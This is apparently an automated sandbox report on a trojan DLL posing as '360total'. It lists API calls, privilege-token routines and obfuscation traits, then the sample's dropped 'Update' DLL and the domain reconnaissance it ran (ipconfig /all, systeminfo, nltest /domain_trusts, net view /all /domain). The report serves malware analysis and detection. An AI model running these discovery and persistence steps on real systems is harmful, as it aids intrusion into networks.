Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CB0C4 NtOpenKey,RtlpNtOpenKey, 4_2_00000203431CB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7B40 NtFreeVirtualMemory, 4_2_00000203431C7B40
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CAD34 NtAllocateVirtualMemory, 4_2_00000203431CAD34
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C378C NtClose, 4_2_00000203431C378C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7588 RtlInitUnicodeString,NtCreateFile,NtClose, 4_2_00000203431C7588
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C77B0 RtlInitUnicodeString,NtCreateFile, 4_2_00000203431C77B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 4_2_00000203431CB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C79C8 NtClose, 4_2_00000203431C79C8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 4_2_00000203431C463C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7A54 NtWriteFile, 4_2_00000203431C7A54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0AC0 NtFreeVirtualMemory, 4_2_00000203431D0AC0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7ACC NtClose, 4_2_00000203431C7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0AF0 NtWriteFile, 4_2_00000203431D0AF0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7704 NtQueryInformationFile, 4_2_00000203431C7704
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CCB54 NtDelayExecution, 4_2_00000203431CCB54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C745C RtlInitUnicodeString,NtOpenFile,NtClose, 4_2_00000203431C745C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0A78 NtClose, 4_2_00000203431D0A78
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7694 RtlInitUnicodeString,NtDeleteFile, 4_2_00000203431C7694
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0A90 NtDeleteFile, 4_2_00000203431D0A90
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013B1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 9_2_000002238013B1D4
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 9_2_000002238013463C
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137A54 NtWriteFile, 9_2_0000022380137A54
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013B0C4 NtOpenKey,RtlpNtOpenKey, 9_2_000002238013B0C4
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013AD34 NtAllocateVirtualMemory, 9_2_000002238013AD34
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137B40 NtFreeVirtualMemory, 9_2_0000022380137B40
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013CB54 NtDelayExecution, 9_2_000002238013CB54
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013378C NtClose, 9_2_000002238013378C
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_00000223801377B0 RtlInitUnicodeString,NtCreateFile, 9_2_00000223801377B0
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_00000223801379C8 NtClose, 9_2_00000223801379C8
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013745C RtlInitUnicodeString,NtOpenFile,NtClose, 9_2_000002238013745C
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380140A78 NtClose, 9_2_0000022380140A78
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137694 RtlInitUnicodeString,NtDeleteFile, 9_2_0000022380137694
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380140A90 NtDeleteFile, 9_2_0000022380140A90
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380140AC0 NtFreeVirtualMemory, 9_2_0000022380140AC0
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_00000223801378C0 NtReadFile, 9_2_00000223801378C0
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137ACC NtClose, 9_2_0000022380137ACC
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137704 NtQueryInformationFile, 9_2_0000022380137704
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137588 RtlInitUnicodeString,NtCreateFile,NtClose, 9_2_0000022380137588
Contains functionality to communicate with device drivers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A2C8: DeviceIoControl, 3_2_000000018006A2C8
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017FE8 3_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006DFF4 3_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800220D8 3_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007C140 3_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060174 3_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008023C 3_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000834C 3_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006C470 3_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800784E0 3_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800764F0 3_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060578 3_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010580 3_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004E5DC 3_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062600 3_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002610 3_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180004638 3_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E760 3_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800647B0 3_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007E7C7 3_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180076930 3_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062954 3_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A994 3_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E9FC 3_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180082A18 3_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180072A27 3_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010B58 3_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180026C84 3_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001ECF4 3_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180008E20 3_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180052FD8 3_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003AFE8 3_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005D014 3_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F0B4 3_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800630CC 3_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005912C 3_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007B2D0 3_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002B2EC 3_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006D3D4 3_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180075480 3_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800694A0 3_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005958C 3_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800576DC 3_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800097E0 3_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800277FC 3_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002D964 3_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073B60 3_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007BBB0 3_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001BC38 3_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005DD18 3_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073DF0 3_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180011DF0 3_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005BE6C 3_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FF88 3_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C1030 4_2_00000203431C1030
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380131030 9_2_0000022380131030
Found potential string decryption / allocating functions
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
One or more processes crash
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 452
Source: classification engine Classification label: mal100.spre.troj.evad.winDLL@42/11@2/2
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 3_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018008395A
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle, 3_2_000000018004B780
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800072A8 CoCreateInstance, 3_2_00000001800072A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free, 3_2_000000018003A8D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update Jump to behavior
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5892:120:WilError_03
Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\eddefae7-6eaa-4249-9c09-cb1fe09591eb Jump to behavior
Source: 360total.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, Update_79066994.dll.4.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, Update_79066994.dll.4.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 452
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 472
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 360total.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
PE file contains an invalid checksum
Source: Update_79066994.dll.4.dr Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.dll Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
PE file contains sections with non-standard names
Source: 360total.dll.dll Static PE information: section name: yhDm^
Source: Update_79066994.dll.4.dr Static PE information: section name: yhDm^
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010451 push rcx; ret 3_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001045A push rcx; ret 3_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018017500F push rdx; iretd 3_2_0000000180175010

Persistence and Installation Behavior
barindex
